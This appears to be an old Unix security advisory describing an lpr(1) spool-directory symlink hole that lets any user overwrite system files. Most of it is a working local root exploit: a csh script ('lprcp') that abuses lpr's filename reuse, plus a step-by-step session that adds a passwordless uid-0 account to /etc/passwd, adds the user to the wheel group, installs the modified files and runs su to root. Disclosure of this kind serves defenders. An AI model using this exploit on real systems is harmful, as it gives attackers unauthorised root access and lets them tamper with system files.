LPR Hole
				========

	lpr(1) can be used to overwrite or create (and become owner of)
	any file on the system.  lpr -s allows users to create symbolic
	links in lpd's spool directory (typically /var/spool/lpd).
	After 1000 invocations of lpr, lpr will reuse the filename in
	the spool directory, and follow the link previously installed.
	It will thus overwrite/create any file that this link points too.

	Any user with access to lpr(1) can alter system files and thus
	become root.

	This example demonstrates how to become root on most affected
	machines by modifying /etc/passwd and /etc/group.  Please do
	not do this unless you have permission.

	Create the following script, 'lprcp':

<--------------------------- cut here ----------------------------
#!/bin/csh -f
# 
# Usage: lprcp from-file to-file
#

if ($#argv != 2) then
	echo Usage: lprcp from-file to-file
	exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$		# lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$		# to where we really want

@ s = 0
while ( $s != 999)		# loop 999 times
	lpr /nofile >&/dev/null	# doesn't exist, but spins the clock!
	@ s++
	if ( $s % 10 == 0 ) echo -n .
end
lpr $1				# incoming file
				# user becomes owner
rm -f /tmp/.tmp.$$
exit 0
<--------------------------- cut here ----------------------------

	(Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:
>	% id
	uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
>	% cp /etc/passwd /tmp/passwd
>	% ex /tmp/passwd
	/tmp/passwd: unmodified: line 42
>	:a
>	8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
>	.
>	:wq
	/tmp/passwd: 43 lines, 2188 characters.
>	% cp /etc/group /tmp
>	% ex /tmp/group
	/tmp/group: unmodified: line 49
>	:/wheel
	wheel:*:0:root,operator
>	:c
>	wheel:*:0:root,operator,8lgm
>	.
>	:wq
	/tmp/group: 49 lines, 944 characters.

Install our new files:
>	% ./lprcp /tmp/group /etc/group
	................................................................
	...................................
	lpr: cannot rename /var/spool/lpd/cfA060testnode
>	% ./lprcp /tmp/passwd /etc/passwd
	.................................................................
	..................................
	lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:
>	% ls -l /etc/passwd /etc/group
	-rw-r--r--    1 8lgm          944 Mar  3 19:56 /etc/group
	-rw-r--r--    1 8lgm         2188 Mar  3 19:59 /etc/passwd
>	% head -1 /etc/group
	wheel:*:0:root,operator,8lgm
>	% grep '^8lgmroot' /etc/passwd
	8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:
>	% su 8lgmroot
	# chown root /etc/passwd /etc/group
	# rm -f /tmp/passwd /tmp/group
	#